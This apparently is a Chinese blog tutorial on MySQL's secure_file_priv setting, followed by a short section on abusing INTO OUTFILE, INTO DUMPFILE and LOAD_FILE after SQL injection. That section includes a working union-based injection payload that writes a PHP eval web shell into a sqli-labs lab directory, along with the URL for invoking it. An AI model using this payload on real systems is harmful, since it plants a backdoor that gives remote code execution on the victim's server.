Mysql 中的secure_file_priv参数设置方法

 更新时间:2024年11月13日 14:23:56   作者:数字兴  
MySQL的secure_file_priv变量用于限制文件的读取和写入,在后期漏洞注入中,可以使用INTO DUMPFILE和INTO OUTFILE将数据写入文件,或者使用LOAD_FILE下载文件,本文介绍Mysql 中的secure_file_priv参数设置,感兴趣的朋友一起看看吧

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。

修改完参数之后,必须重启数据库才能生效。

启动MySQL,先查看secure_file_priv的值。

命令:show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路径;

内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;

dumpfile只能写一行,并且输出中不存在任何格式。

2.select  *** into outfile  文件路径;

内容有特殊格式转换,该换行换行,较比dumpfile更加好用;

outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。

例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

调用:url/test.php?123=phpinfo();

3.select  *** load_file (下载文件)

select  load_file(文件路径);

到此这篇关于Mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

相关文章

  • Windows Server 2019部署MySQL 8完整步骤教程

    Windows Server 2019部署MySQL 8完整步骤教程

    MySQL在开发开源软件时经常被当作该软件的数据管理系统,所以我们在开发时将会经常用到它,所以如何安装MySQL就是一个问题了,这篇文章主要介绍了Windows Server 2019部署MySQL 8的相关资料,需要的朋友可以参考下
    2026-04-04
  • mysql查找配置文件位置的两种方法

    mysql查找配置文件位置的两种方法

    想去查看windows系统下,MySQL数据库的配置文件,由于距离上一次查看时间太久,每次查看都要找很久在什么位置,所以本文给大家介绍了mysql查找配置文件位置的两种方法,需要的朋友可以参考下
    2024-09-09
  • 关于MySQL的ORDER BY排序详解

    关于MySQL的ORDER BY排序详解

    这篇文章主要介绍了关于MySQL的ORDER BY排序详解,如果没有使用排序操作,默认情况下查询返回的数据是按照添加数据的顺序显示的,需要的朋友可以参考下
    2023-05-05
  • MySQL 多列 IN 查询之语法、性能与实战技巧(最新整理)

    MySQL 多列 IN 查询之语法、性能与实战技巧(最新整理)

    本文详解MySQL多列IN查询,对比传统OR写法,强调其简洁高效,适合批量匹配复合键,通过联合索引、分批次优化提升性能,兼容多种数据库,提供动态生成和实战技巧,助力复杂条件查询优化,感兴趣的朋友一起看看吧
    2025-07-07
  • mysql日志文件在哪 如何修改MySQL日志文件位置

    mysql日志文件在哪 如何修改MySQL日志文件位置

    MySQL日志文件相信大家都有很多的了解,MySQL日志文件一般在:/var/log/mysqld.log,下面介绍如何修改MySQL日志文件位置,需要的朋友可以参考下
    2012-12-12
  • MySQL基础学习之字符集的应用

    MySQL基础学习之字符集的应用

    这篇文章主要为大家详细介绍了MySQL中字符集的相关使用,例如字符集的查询与修改和比较规则等,文中的示例代码讲解详细,需要的可以参考一下
    2023-05-05
  • MySQL服务无法启动且服务没有报告任何错误的解决办法

    MySQL服务无法启动且服务没有报告任何错误的解决办法

    在启动项目时,发现昨天能够跑的项目今天跑不了了,一看原来是mysql数据库出现了问题,下面这篇文章主要给大家介绍了关于MySQL服务无法启动且服务没有报告任何错误的解决办法,需要的朋友可以参考下
    2023-05-05
  • 在VB.NET应用中使用MySQL的方法

    在VB.NET应用中使用MySQL的方法

    这篇文章主要介绍了在VB.NET应用中使用MySQL的方法,操作基于Visual Studio IDE进行,需要的朋友可以参考下
    2015-06-06
  • Linux远程部署MySQL数据库详细步骤

    Linux远程部署MySQL数据库详细步骤

    这篇文章主要介绍了Linux远程部署MySQL数据库的详细步骤,文中步骤介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2019-11-11
  • mysql利用mysqlbinlog命令恢复误删除数据的实现

    mysql利用mysqlbinlog命令恢复误删除数据的实现

    这篇文章主要介绍了mysql利用mysqlbinlog命令恢复误删除数据的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
    2021-03-03

最新评论